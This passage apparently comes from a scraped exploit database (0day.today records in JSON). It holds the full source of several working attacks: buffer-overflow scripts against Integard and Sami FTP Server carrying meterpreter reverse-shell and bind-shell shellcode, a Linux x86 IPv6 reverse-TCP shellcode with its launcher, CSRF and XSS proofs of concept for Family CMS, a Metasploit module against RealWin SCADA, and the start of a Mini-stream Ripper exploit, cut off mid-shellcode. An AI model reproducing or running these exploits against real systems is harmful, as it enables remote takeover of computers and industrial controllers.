\"\\x28\\x3a\\x8a\\x56\\xf8\\x72\\x73\\xf4\\xc5\\xba\\x86\"\r\n meterpreter += \"\\x04\\x01\\x7c\\x78\\x73\\x7b\\x7e\\x05\\x84\\xb8\\xfc\"\r\n meterpreter += \"\\xd1\\x01\\x5b\\xa6\\x92\\xb2\\x87\\x56\\x77\\x24\\x43\"\r\n meterpreter += \"\\x54\\x3c\\x22\\x0b\\x79\\xc3\\xe7\\x27\\x85\\x48\\x06\"\r\n meterpreter += \"\\xe8\\x0f\\x0a\\x2d\\x2c\\x4b\\xc9\\x4c\\x75\\x31\\xbc\"\r\n meterpreter += \"\\x71\\x65\\x9a\\x61\\xd4\\xed\\x37\\x76\\x65\\xac\\x5f\"\r\n meterpreter += \"\\xbb\\x44\\x4f\\xa0\\xd3\\xdf\\x3c\\x92\\x7c\\x74\\xab\"\r\n meterpreter += \"\\x9e\\xf5\\x52\\x2c\\x96\\x11\\x65\\xe2\\x10\\x71\\x9b\"\r\n meterpreter += \"\\x03\\x61\\x58\\x58\\x57\\x31\\xf2\\x49\\xd8\\xda\\x02\"\r\n meterpreter += \"\\x75\\x0d\\x76\\x08\\xe1\\xa4\\x87\\x0c\\x71\\xd0\\x85\"\r\n meterpreter += \"\\x0c\\x52\\x08\\x03\\xea\\xc4\\x1a\\x43\\xa2\\xa4\\xca\"\r\n meterpreter += \"\\x23\\x12\\x4d\\x01\\xac\\x4d\\x6d\\x2a\\x66\\xe6\\x04\"\r\n meterpreter += 
\"\\xc5\\xdf\\x5f\\xb1\\x7c\\x7a\\x2b\\x20\\x80\\x50\\x56\"\r\n meterpreter += \"\\x62\\x0a\\x51\\xa7\\x2d\\xfb\\x10\\xbb\\x5a\\x9c\\xda\"\r\n meterpreter += \"\\x43\\x9b\\x09\\xdb\\x29\\x9f\\x9b\\x8c\\xc5\\x9d\\xfa\"\r\n meterpreter += \"\\xfb\\x4a\\x5d\\x29\\x78\\x8c\\xa1\\xac\\x49\\xe7\\x94\"\r\n meterpreter += \"\\x3a\\xf6\\x9f\\xd8\\xaa\\xf6\\x5f\\x8f\\xa0\\xf6\\x37\"\r\n meterpreter += \"\\x77\\x91\\xa4\\x22\\x78\\x0c\\xd9\\xff\\xed\\xaf\\x88\"\r\n meterpreter += \"\\xac\\xa6\\xc7\\x36\\x8b\\x81\\x47\\xc8\\xfe\\x91\\x80\"\r\n meterpreter += \"\\x36\\x7d\\xbe\\x28\\x5f\\x7d\\xfe\\xc8\\x9f\\x17\\xfe\"\r\n meterpreter += \"\\x98\\xf7\\xec\\xd1\\x17\\x38\\x0d\\xf8\\x7f\\x50\\x84\"\r\n meterpreter += \"\\x6d\\xcd\\xc1\\x99\\xa7\\x93\\x5f\\x9a\\x44\\x08\\x6f\"\r\n meterpreter += \"\\xe1\\x25\\xaf\\x90\\x16\\x2c\\xd4\\x90\\x17\\x50\\xea\"\r\n meterpreter += \"\\xad\\xce\\x69\\x98\\xf0\\xd3\\xcd\\x83\\xee\\xf9\\x3b\"\r\n meterpreter += \"\\x2c\\xb7\\x68\\x86\\x31\\x48\\x47\\xc5\\x4f\\xcb\\x6d\"\r\n meterpreter += \"\\xb6\\xab\\xd3\\x04\\xb3\\xf0\\x53\\xf5\\xc9\\x69\\x36\"\r\n meterpreter += \"\\xf9\\x7e\\x89\\x13\"\r\n\r\n if target == \"1\":\r\n print \"[*] Sending Windows XP payload using meterpreter/reverse_tcp\"\r\n # JMP ESP at 0x3E087557 in iertutil.dll\r\n crash = \"A\" * 512\r\n crash += pack(\"<L\",0x3E087557)\r\n crash += meterpreter\r\n crash += \"C\" * (1500 - len(crash))\r\n\r\n buffer = \"\"\r\n buffer += \"POST /LoginAdmin HTTP/1.1\\r\\n\"\r\n buffer += \"Host: 10.0.0.130:18881\\r\\n\"\r\n buffer += \"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\\r\\n\"\r\n buffer += \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\"\r\n buffer += \"Accept-Language: en-US,en;q=0.5\\r\\n\"\r\n buffer += \"Accept-Encoding: gzip, deflate\\r\\n\"\r\n buffer += \"Referer: http://10.0.0.130:18881/\\r\\n\"\r\n buffer += \"Connection: close\\r\\n\"\r\n buffer += \"Upgrade-Insecure-Requests: 1\\r\\n\"\r\n buffer 
+= \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n buffer += \"Content-Length: 78\\r\\n\\r\\n\"\r\n buffer += \"Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=\" + crash + \"&LoginButtonName=Login\\r\\n\"\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((host,port))\r\n s.send(buffer)\r\n s.close()\r\n print \"[*] Done\"\r\n\r\n if target == \"2\":\r\n print \"[*] Sending Windows 7/10 payload using meterpreter/reverse_tcp\"\r\n \r\n # ASLR IS ON!!! MUST USE NON-ASLR MODULE!\r\n # POP POP RET in integard.exe (ASLR disabled)\r\n nSEH = \"\\xEB\\xD0\\x90\\x90\" # Jump 48 bytes backwards\r\n SEH = pack(\"<L\",0x004042B0)\r\n\r\n jumpCall = \"\\xEB\\x09\" # Jump 11 bytes forward to hit the CALL in bigBackJump\r\n bigBackJump = \"\\x59\\xFE\\xCD\\xFE\\xCD\\xFE\\xCD\\xFF\\xE1\\xE8\\xF2\\xFF\\xFF\\xFF\"\r\n \r\n crash = \"\\x90\" * (2776 -len(jumpCall) - len(bigBackJump) - len(meterpreter) - 50)\r\n crash += meterpreter\r\n crash += \"\\x90\" * 50\r\n crash += jumpCall\r\n crash += bigBackJump\r\n crash += nSEH\r\n crash += SEH\r\n\r\n\r\n buffer = \"\"\r\n buffer += \"POST /LoginAdmin HTTP/1.1\\r\\n\"\r\n buffer += \"Host: 10.0.0.130:18881\\r\\n\"\r\n buffer += \"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\\r\\n\"\r\n buffer += \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\"\r\n buffer += \"Accept-Language: en-US,en;q=0.5\\r\\n\"\r\n buffer += \"Accept-Encoding: gzip, deflate\\r\\n\"\r\n buffer += \"Referer: http://10.0.0.130:18881/\\r\\n\"\r\n buffer += \"Connection: close\\r\\n\"\r\n buffer += \"Upgrade-Insecure-Requests: 1\\r\\n\"\r\n buffer += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n buffer += \"Content-Length: 78\\r\\n\\r\\n\"\r\n buffer += \"Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=\" + crash + \"&LoginButtonName=Login\\r\\n\"\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n 
s.connect((host,port))\r\n s.send(buffer)\r\n s.close()\r\n print \"[*] Done\"\r\n\r\nmain()\n\n# 0day.today [2019-12-06] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/33629"}, {"lastseen": "2018-01-03T09:02:07", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2016-11-01T00:00:00", "published": "2016-11-01T00:00:00", "href": "https://0day.today/exploit/description/26196", "id": "1337DAY-ID-26196", "type": "zdt", "title": "KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH) Exploit", "sourceData": "#/usr/bin/python\r\n#-*- Coding: utf-8 -*-\r\n \r\n### Sami FTP Server 2.0.2- SEH Overwrite, Buffer Overflow by n30m1nd ### \r\n \r\n# Date: 2016-01-11\r\n# Exploit Author: n30m1nd\r\n# Vendor Homepage: http://www.karjasoft.com/\r\n# Software Link: http://www.karjasoft.com/files/samiftp/samiftpd_install.exe\r\n# Version: 2.0.2\r\n# Tested on: Win7 64bit and Win10 64 bit\r\n \r\n# Credits\r\n# =======\r\n# Thanks to PHRACK for maintaining all the articles up for so much time... 
\r\n# These are priceless and still current for exploit development!!\r\n# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better\r\n \r\n# How to\r\n# ======\r\n# * Open Sami FTP Server and open its graphical interface\r\n# * Run this python script and write the IP to attack\r\n# * Connect to the same IP on port 4444\r\n#\r\n# BONUS\r\n# =====\r\n# Since the program will write the data into its (SamiFTP.binlog) logs it will try to load these logs on each\r\n# start and so, it will crash and run our shellcode everytime it starts.\r\n \r\n# Why?\r\n# ====\r\n# The graphical interface tries to show the user name which produces an overflow overwriting SEH\r\n \r\n# Exploit code\r\n# ============\r\n \r\nimport socket\r\nimport struct\r\n \r\ndef doHavoc(ipaddr):\r\n # Bad chars: 00 0d 0a ff\r\n alignment = \"\\x90\"*3\r\n \r\n jmpfront = \"345A7504\".decode('hex')\r\n #CPU Disasm\r\n #Hex dump Command \r\n # 34 5A XOR AL,5A\r\n # 75 04 JNE SHORT +04\r\n \r\n # pop pop ret in tmp01.dll\r\n popret = 0x10022ADE\r\n \r\n # fstenv trick to get eip: phrack number 62\r\n # and store it into EAX for the metasploit shell (BufferRegister)\r\n getEIPinEAX = \"D9EED934E48B44E40C040b\".decode('hex')\r\n #CPU Disasm\r\n #Hex dump Command\r\n # D9EE FLDZ\r\n # D934E4 FSTENV SS:[ESP]\r\n # 8B44E4 0C MOV EAX,DWORD PTR SS:[ESP+0C]\r\n # 04 0B ADD AL,0B\r\n \r\n # Bind shellcode on port 4444 - alpha mixed BufferRegister=EAX\r\n shellcode = (\r\n getEIPinEAX +\r\n \"PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylm8mRS0UP7p\"\r\n \"e0K9jEDqYPU4Nk60VPlKCbdLnkbrWdLKqb4hfoNWczEvdqyoNLElpaalC2dl10kq\"\r\n \"xO6mEQ9WxbjRf22wNkf220lKsz5lNkblr1sHxcsxGqZqcaLK0YQ05QiCNkCyB8Hc\"\r\n \"VZ1Ynk5dlKEQyF01IoNLYQHOvm31yW6X9pRUXvwsSMIhgKqmDdT5KTf8NkaHWTEQ\"\r\n \"yCavNkDLBklKbx7lgqN3nkC4nkuQXPk9w47Tq4skaKsQV9pZPQkOYpcosobzNkWb\"\r\n \"8kNmSmbH5cP2C0Wpu8Qgd3UbCof4e80LD7ev379oyElxlP31GpWpFIo4V4bpCXa9\"\r\n 
\"op2KePyohURJFhPY0P8bimw0pPG0rpu8xjDOYOipYoiEj7QxWrC0wa3lmYZFbJDP\"\r\n \"qFqGCXYRIKDw3WkOZuv7CXNWkYehKOkOiEaGPhD4HlwKm1KOhUQGJ7BHRUpnrmqq\"\r\n \"Iokee83S2McT30oyXcQGV767FQIfcZfrv9PVYrImQvKwG4DdelvaGqLM0D5tDPO6\"\r\n \"GpRd0T602vaFF6w666rnqFsf2sPV0h2YzleoovYoXUK9kPrnSfPFYo00Ph7xk7wm\"\r\n \"sPYoKeMkxplulb2vsXoVmEOMomKO9EgL4FCLFjk0YkM0qec5Mkg7FsD2ROqzGpv3\"\r\n \"ioJuAA\"\r\n )\r\n \r\n # Final payload, SEH overwrite ocurrs at 600 bytes\r\n payload = alignment + \".\"*(600-len(alignment)-len(jmpfront)) + jmpfront + struct.pack(\"<L\", popret) + shellcode\r\n try:\r\n s = socket.create_connection((ipaddr, 21))\r\n s.send(\"USER \"+ payload +\"\\r\\n\" )\r\n print s.recv(4096)\r\n \r\n s.send(\"PASS \"+ payload +\"\\r\\n\" )\r\n print s.recv(4096)\r\n print s.recv(4096)\r\n except e:\r\n print str(e)\r\n exit(\"[+] Couldn't connect\")\r\n \r\nif __name__ == \"__main__\":\r\n ipaddr = raw_input(\"[+] IP: \")\r\n doHavoc(ipaddr)\r\n while raw_input(\"[?] Got shell?(y/n) \").lower() == \"n\":\r\n doHavoc(ipaddr)\r\n print \"[+] Enjoy...\"\n\n# 0day.today [2018-01-03] #", "sourceHref": "https://0day.today/exploit/26196", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-04T11:11:42", "bulletinFamily": "exploit", "description": "Exploit for linux/x86 platform in category shellcode", "modified": "2016-04-25T00:00:00", "published": "2016-04-25T00:00:00", "id": "1337DAY-ID-25670", "href": "https://0day.today/exploit/description/25670", "type": "zdt", "title": "Linux/x86 - Reverse TCP Shellcode (IPv6) (159 bytes)", "sourceData": "/*\r\n \r\n# Title: linux x86 reverse tcp (ipv6)\r\n# Date: 22-04-2016\r\n# Exploit Author: Roziul Hasan Khan Shifat\r\n# Tested on: kali 2.0 and Ubuntu 14.04 LTS\r\n# Contact: [email\u00a0protected]\r\n \r\n*/\r\n \r\n/*\r\nsection .text\r\n global _start\r\n_start:\r\n \r\n;;socket()\r\nxor ebx,ebx\r\nmul ebx ;null out eax\r\n \r\npush byte 6\r\npush byte 0x1\r\npush byte 10\r\n 
\r\nmov ecx,esp\r\n \r\nmov al,102 ;socketcall()\r\nmov bl,1 ;socket()\r\nint 0x80\r\n \r\nmov esi,eax ;storing socket descriptor (we know return value of any syscall stores in eax)\r\n \r\nxor eax,eax\r\n \r\nmov al,2\r\nxor ebx,ebx\r\nint 80h\r\n \r\n \r\ncmp eax,ebx\r\nje connect\r\nja exit\r\n \r\n;------------------\r\n \r\n;------------------------\r\n \r\nconnect:\r\n \r\nxor ecx,ecx\r\n;-------------------------------------------------------\r\n;struct sockaddr_in6\r\nxor ebx,ebx\r\n \r\npush dword ebx ;sin6_scope_id 4 byte\r\n \r\npush dword 0x8140a8c0 ; only change it to Your ipv4 address (current ipv4 192.168.64.129)\r\n \r\npush word 0xffff\r\npush dword ebx\r\npush dword ebx\r\npush word bx ;sin6_addr 16 byte (ipv6 address ::ffff:192.168.64.129)\r\n \r\npush dword ebx ;sin6_flowinfo=4 byte\r\n \r\npush word 0xc005 ;sin6_port 2 byte (port 1472)\r\n \r\npush word 10 ;sa_family_t=2 byte \r\n \r\n;end of struct sockaddr_in6\r\n \r\nmov ecx,esp\r\n \r\n;--------------------------------------------\r\n \r\n;;connect()\r\n \r\npush byte 28 ;sizeof ;struct sockaddr_in6\r\n \r\npush ecx\r\n \r\npush esi\r\n \r\nxor ebx,ebx\r\nxor eax,eax\r\nmov al,102\r\nmov bl,3 ;connect()\r\nmov ecx,esp\r\nint 0x80\r\n \r\nxor ebx,ebx\r\n \r\ncmp eax,ebx\r\njne retry ;if it fails to connect ,it will retry to connect to attacker after 10 seconds\r\n \r\n;dup2(sd,0)\r\n \r\nxor ecx,ecx\r\nmul ecx\r\n \r\nmov ebx,esi\r\nmov al,63\r\nint 80h\r\n \r\n;dup2(sd,1)\r\n \r\nxor eax,eax\r\ninc ecx\r\n \r\nmov ebx,esi\r\nmov al,63\r\nint 80h\r\n \r\n;;dup2(sd,2)\r\n \r\nxor eax,eax\r\ninc ecx\r\n \r\nmov ebx,esi\r\nmov al,63\r\nint 80h\r\n \r\n;;execve(/bin//sh)\r\n \r\nxor edx,edx\r\nmul edx\r\n \r\npush edx ;null terminated /bin//sh\r\npush 0x68732f2f\r\npush 0x6e69622f\r\n \r\nmov ebx,esp\r\n \r\npush edx\r\npush ebx\r\n \r\nmov ecx,esp\r\n \r\nmov al,11 ;execve()\r\nint 0x80\r\n \r\nret\r\n \r\n;------------------------------------------------------\r\n \r\nretry:\r\n \r\nxor 
ebx,ebx\r\n \r\npush ebx\r\npush byte 10\r\n \r\nmul ebx\r\nmov ebx,esp\r\n \r\nmov al,0xa2 ;nanosleep()\r\n \r\nint 80h\r\n \r\njmp connect\r\n \r\nret\r\n \r\n;----------------------------\r\nexit:\r\nxor eax,eax\r\nmov al,1\r\nint 80h\r\n \r\n*/\r\n \r\n \r\n/* \r\nto compile:\r\n \r\n$nasm -f elf filename.s\r\n$ld filename.o\r\n$./a.out\r\n \r\nto compile shellcode\r\n \r\n$gcc -fno-stack-protector -z execstack shellcode.c -o shellcode\r\n$./shellcode\r\n \r\n*/\r\n \r\n \r\n#include<string.h>\r\n#include<stdio.h>\r\nchar shellcode[]=\"\\x31\\xdb\\xf7\\xe3\\x6a\\x06\\x6a\\x01\\x6a\\x0a\\x89\\xe1\\xb0\\x66\\xb3\\x01\\xcd\\x80\\x89\\xc6\\x31\\xc0\\xb0\\x02\\x31\\xdb\\xcd\\x80\\x39\\xd8\\x74\\x02\\x77\\x77\\x31\\xc9\\x31\\xdb\\x53\\x68\\xc0\\xa8\\x40\\x81\\x66\\x6a\\xff\\x53\\x53\\x66\\x53\\x53\\x66\\x68\\x05\\xc0\\x66\\x6a\\x0a\\x89\\xe1\\x6a\\x1c\\x51\\x56\\x31\\xdb\\x31\\xc0\\xb0\\x66\\xb3\\x03\\x89\\xe1\\xcd\\x80\\x31\\xdb\\x39\\xd8\\x75\\x36\\x31\\xc9\\xf7\\xe1\\x89\\xf3\\xb0\\x3f\\xcd\\x80\\x31\\xc0\\x41\\x89\\xf3\\xb0\\x3f\\xcd\\x80\\x31\\xc0\\x41\\x89\\xf3\\xb0\\x3f\\xcd\\x80\\x31\\xd2\\xf7\\xe2\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\\xc3\\x31\\xdb\\x53\\x6a\\x0a\\xf7\\xe3\\x89\\xe3\\xb0\\xa2\\xcd\\x80\\xeb\\x8a\\xc3\\x31\\xc0\\xb0\\x01\\xcd\\x80\";\r\n \r\n \r\nint (*exec_shellcode)();\r\nmain()\r\n{\r\nprintf(\"Shellcode length: %ld\\n\",(long)strlen(shellcode));\r\nexec_shellcode=(int(*)())shellcode;\r\n(*exec_shellcode)();\r\n \r\n}\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25670"}, {"lastseen": "2018-01-02T09:03:54", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2012-03-26T00:00:00", "published": "2012-03-26T00:00:00", "id": "1337DAY-ID-17835", "href": "https://0day.today/exploit/description/17835", "type": "zdt", "title": "Family CMS 2.9 and 
earlier multiple Vulnerabilities", "sourceData": "Family CMS 2.9 and earlier multiple Vulnerabilities\r\n===================================================================================\r\n# Exploit Title: Family CMS 2.9 and earlier multiple Vulnerabilities\r\n# Download link :http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.9/FCMS_2.9.zip/download\r\n# Author: Ahmed Elhady Mohamed\r\n# Email : [email\u00a0protected]\r\n# version: 2.9\r\n# Category: webapps\r\n# Tested on: ubuntu 11.4 \r\n===================================================================================\r\n \r\n \r\n Tips:\r\n *****First we must install all optional sections during installation process.***** \r\n \r\n1- CSRF Vulnerabilities :\r\n \r\n POC 1: Page \"familynews.php\"\r\n \r\n \r\n <html>\r\n <head>\r\n <script type=\"text/javascript\">\r\n function autosubmit() {\r\n document.getElementById('ChangeSubmit').submit();\r\n } \r\n </script>\r\n </head>\r\n <body onLoad=\"autosubmit()\">\r\n <form method=\"POST\" action=\"http://[localhost]/FCMS_2.9/familynews.php\" id=\"ChangeSubmit\">\r\n <input type=\"hidden\" name=\"title\" value=\"test\" />\r\n <input type=\"hidden\" name=\"submitadd\" value=\"Add\" />\r\n <input type=\"hidden\" name=\"post\" value=\"testcsrf\" />\r\n <input type=\"submit\" value=\"submit\"/>\r\n </form>\r\n </body>\r\n </html>\r\n \r\n --------------------------------------------------------------------------------------------------------\r\n \r\n POC 2:Page \"prayers.php\"\r\n \r\n \r\n <html>\r\n <head>\r\n <script type=\"text/javascript\">\r\n function autosubmit() {\r\n document.getElementById('ChangeSubmit').submit();\r\n } \r\n </script>\r\n </head>\r\n <body onLoad=\"autosubmit()\">\r\n <form method=\"POST\" action=\"http://[localhost]/FCMS_2.9/prayers.php\" id=\"ChangeSubmit\">\r\n <input type=\"hidden\" name=\"for\" value=\"test\" />\r\n <input type=\"hidden\" name=\"submitadd\" value=\"Add\" />\r\n <input type=\"hidden\" 
name=\"desc\" value=\"testtest\" />\r\n <input type=\"submit\" value=\"submit\"/>\r\n </form>\r\n \r\n </body>\r\n </html>\r\n----------------------------------------------------------------------------------------------------------------------------\r\n2-Reflected XSS\r\n \r\n POC : http://[localhost]/fcms_2.9/gallery/index.php?uid=%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E\r\n \r\n-----------------------------------------------------------------------------------------------------------------------------\r\n\r\n\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/17835"}, {"lastseen": "2018-04-13T07:50:35", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2011-06-22T00:00:00", "published": "2011-06-22T00:00:00", "id": "1337DAY-ID-16370", "href": "https://0day.today/exploit/description/16370", "type": "zdt", "title": "RealWin SCADA Server DATAC Login Buffer Overflow", "sourceData": "##\r\n# $Id: realwin_on_fcs_login.rb 13007 2011-06-22 22:36:55Z sinn3r $\r\n##\r\n \r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n \r\n include Msf::Exploit::Remote::Tcp\r\n include Msf::Exploit::Remote::Seh\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'RealWin SCADA Server DATAC Login Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a stack buffer overflow in DATAC Control\r\n International RealWin SCADA Server 2.1 (Build 6.0.10.10) or\r\n earlier. 
By sending a specially crafted On_FC_CONNECT_FCS_LOGIN\r\n packet containing a long username, an attacker may be able to\r\n execute arbitrary code.\r\n },\r\n 'Author' =>\r\n [\r\n 'Luigi Auriemma', #discovery\r\n 'MC',\r\n 'B|H <bh[AT]bufferattack.com>'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Version' => '$Revision: 13007 $',\r\n 'References' =>\r\n [\r\n [ 'URL', 'http://aluigi.altervista.org/adv/realwin_2-adv.txt' ],\r\n [ 'URL', 'http://www.dataconline.com/software/realwin.php' ],\r\n ],\r\n 'Privileged' => true,\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'thread',\r\n },\r\n 'Payload' =>\r\n {\r\n 'Space' => 450,\r\n 'BadChars' => \"\\x00\\x20\\x0a\\x0d\",\r\n 'StackAdjustment' => -3500,\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Universal',\r\n {\r\n 'Offset' => 392, # Offset to SEH\r\n 'Ret' => 0x40012540, # pop/pop/ret @FlexMLang.dll\r\n }\r\n ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Mar 21 2011'))\r\n \r\n register_options([Opt::RPORT(910)], self.class)\r\n end\r\n \r\n def exploit\r\n data = [0x67542310].pack('V')\r\n data << [0x00000824].pack('V')\r\n data << [0x00110011].pack('V')\r\n data << \"\\x01\\x00\"\r\n data << rand_text_alpha_upper(target['Offset'])\r\n data << generate_seh_payload(target.ret)\r\n data << rand_text_alpha_upper(17706 - payload.encoded.length)\r\n data << [0x451c3500].pack('V')\r\n data << [0x00000154].pack('V')\r\n data << [0x00020040].pack('V')\r\n \r\n connect\r\n print_status(\"Trying target #{target.name}...\")\r\n sock.put(data)\r\n select(nil,nil,nil,0.5)\r\n handler\r\n disconnect\r\n end\r\n \r\nend\r\n\r\n\n\n# 0day.today [2018-04-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/16370"}, {"lastseen": "2018-02-06T01:26:46", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category local exploits", "modified": "2009-12-27T00:00:00", "published": "2009-12-27T00:00:00", "id": "1337DAY-ID-8215", "href": 
"https://0day.today/exploit/description/8215", "type": "zdt", "title": "Mini-stream ripper => 3.0.1.1 (.pls) Local Universal Buffer Overflow", "sourceData": "============================================================================\r\nMini-stream ripper => 3.0.1.1 (.pls) Local Universal Buffer Overflow Exploit\r\n============================================================================\r\n\r\n\r\n\r\n# Title: Mini-stream ripper => 3.0.1.1 (.pls) Local Universal Buffer Overflow Exploit\r\n# CVE-ID: ()\r\n# OSVDB-ID: ()\r\n# Author: mr_me\r\n# Published: 2009-12-27\r\n# Verified: yes\r\n\r\nview source\r\nprint?\r\n/*\r\n \r\nriptheministreamripper.c\r\n \r\nMini-stream ripper => 3.0.1.1 (.pls) Local Universal Buffer Overflow Exploit\r\nexploited by: mr_me\r\nGreetz to the Corlan Security Team: corelanc0d3r, rick, edi, dellnull, marko T, phifli, corelanc0d3r\r\nVisit: corelanc0d3r's blog http://www.corelan.be:8800/\r\nreference: http://www.exploit-db.com/exploits/10646\r\nDownload: http://mini-stream.net/\r\nTested on: Windows XP sp3\r\n \r\nNote: *** For educational purposes only ***\r\n \r\nusage:\r\nCompile and execute to create the .pls file and upload it to your favourite server.\r\nThen click on 'LOAD' and then 'URL'. Enter the evil URL, BAM you win.\r\n \r\n[email\u00a0protected]:~$ nc -v 192.168.2.5 4444\r\n192.168.2.5: inverse host lookup failed: Unknown server error : Connection timed out\r\n(UNKNOWN) [192.168.2.5] 4444 (?) open\r\nMicrosoft Windows XP [Version 5.1.2600]\r\n(C) Copyright 1985-2001 Microsoft Corp.\r\n \r\nC:\\Program Files\\Mini-stream\\Mini-stream Ripper>\r\n \r\nI hope everyone had a Merry Christmas! 
and soon to have a Happy New Year!\r\n \r\n*/\r\n \r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n \r\n/* win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum\r\n http://metasploit.com */\r\n \r\nunsigned char shell[] =\r\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\"\r\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\"\r\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\"\r\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\"\r\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4c\\x36\\x4b\\x4e\"\r\n\"\\x4f\\x44\\x4a\\x4e\\x49\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x42\\x56\\x4b\\x58\"\r\n\"\\x4e\\x56\\x46\\x32\\x46\\x32\\x4b\\x38\\x45\\x44\\x4e\\x43\\x4b\\x58\\x4e\\x47\"\r\n\"\\x45\\x50\\x4a\\x57\\x41\\x50\\x4f\\x4e\\x4b\\x38\\x4f\\x34\\x4a\\x41\\x4b\\x58\"\r\n\"\\x4f\\x55\\x42\\x52\\x41\\x30\\x4b\\x4e\\x43\\x4e\\x42\\x53\\x49\\x54\\x4b\\x38\"\r\n\"\\x46\\x53\\x4b\\x58\\x41\\x30\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x39\\x4e\\x4a\"\r\n\"\\x46\\x58\\x42\\x4c\\x46\\x57\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x30\"\r\n\"\\x44\\x4c\\x4b\\x4e\\x46\\x4f\\x4b\\x33\\x46\\x55\\x46\\x42\\x4a\\x42\\x45\\x57\"\r\n\"\\x43\\x4e\\x4b\\x58\\x4f\\x55\\x46\\x52\\x41\\x50\\x4b\\x4e\\x48\\x36\\x4b\\x58\"\r\n\"\\x4e\\x50\\x4b\\x34\\x4b\\x48\\x4f\\x55\\x4e\\x41\\x41\\x30\\x4b\\x4e\\x43\\x30\"\r\n\"\\x4e\\x52\\x4b\\x48\\x49\\x38\\x4e\\x36\\x46\\x42\\x4e\\x41\\x41\\x56\\x43\\x4c\"\r\n\"\\x41\\x43\\x42\\x4c\\x46\\x46\\x4b\\x48\\x42\\x54\\x42\\x33\\x4b\\x58\\x42\\x44\"\r\n\"\\x4e\\x50\\x4b\\x38\\x42\\x47\\x4e\\x41\\x4d\\x4a\\x4b\\x48\\x42\\x54\\x4a\\x50\"\r\n\"\\x50\\x35\\x4a\\x46\\x50\\x58\\x50\\x44\\x50\\x50\\x4e\\x4e\\x42\\x35\\x4f\\x4f\"\r\n\"\\x48\\x4d\\x41\\x53\\x4b\\x4d\\x48\\x36\\x43\\x55\\x48\\x56\\x4a\\x36\\x43\\x33\"\r\n\"\\x44\\x33\\x4a\\x56\\x47\\x47\\x43\\x47\\x44\\x33\\x4f\\x55\\x
